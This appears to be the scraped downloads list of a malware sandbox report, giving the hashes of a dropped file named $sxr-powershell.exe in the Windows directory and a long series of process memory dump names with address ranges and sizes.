6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/616-166-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/616-168-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/616-165-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/1232-223-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/1232-236-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/1412-239-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/1412-217-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/1732-180-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/1732-157-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/1732-181-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/1732-167-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/1732-177-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/1732-169-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/1732-176-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/2380-311-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/2460-170-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2460-175-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/2680-337-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/2680-335-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/2748-313-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/2748-187-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/2748-183-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/2748-184-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/2748-174-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/2748-172-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/2748-158-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/2748-159-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/2748-160-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/2748-161-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/2748-156-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/3136-269-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/3136-213-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/3136-211-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/3136-210-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/3136-204-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/3136-225-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/3136-279-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/3136-224-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/3268-149-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3268-150-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3268-146-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3268-144-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3728-301-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-247-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4268-262-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4268-274-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4268-178-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-182-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4268-148-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/4268-137-0x000001C375DD0000-0x000001C375DF2000-memory.dmp

Filesize
136KB

Download
memory/4268-138-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-289-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-147-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4268-292-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/4268-140-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4268-290-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4268-252-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4268-141-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/4268-142-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4380-300-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4496-197-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4496-192-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/4496-188-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4496-235-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/4496-237-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4496-198-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/4496-203-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4496-199-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/4496-191-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/5144-232-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5144-238-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5180-226-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5180-219-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5180-221-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5180-243-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5216-310-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5240-234-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5240-281-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5248-264-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/5248-272-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/5248-267-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/5248-268-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/5248-270-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/5292-303-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5340-240-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5368-296-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5496-241-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5584-298-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5608-242-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5676-322-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5676-320-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5828-273-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/5828-257-0x00007FFE67140000-0x00007FFE671FE000-memory.dmp

Filesize
760KB

Download
memory/5828-271-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/5828-309-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5828-275-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/5828-256-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/5828-280-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/5828-246-0x00007FFE461E0000-0x00007FFE46CA1000-memory.dmp

Filesize
10.8MB

Download
memory/5828-325-0x00007FFE688B0000-0x00007FFE68AA5000-memory.dmp

Filesize
2.0MB

Download
memory/5952-254-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5952-251-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5952-255-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/5952-253-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download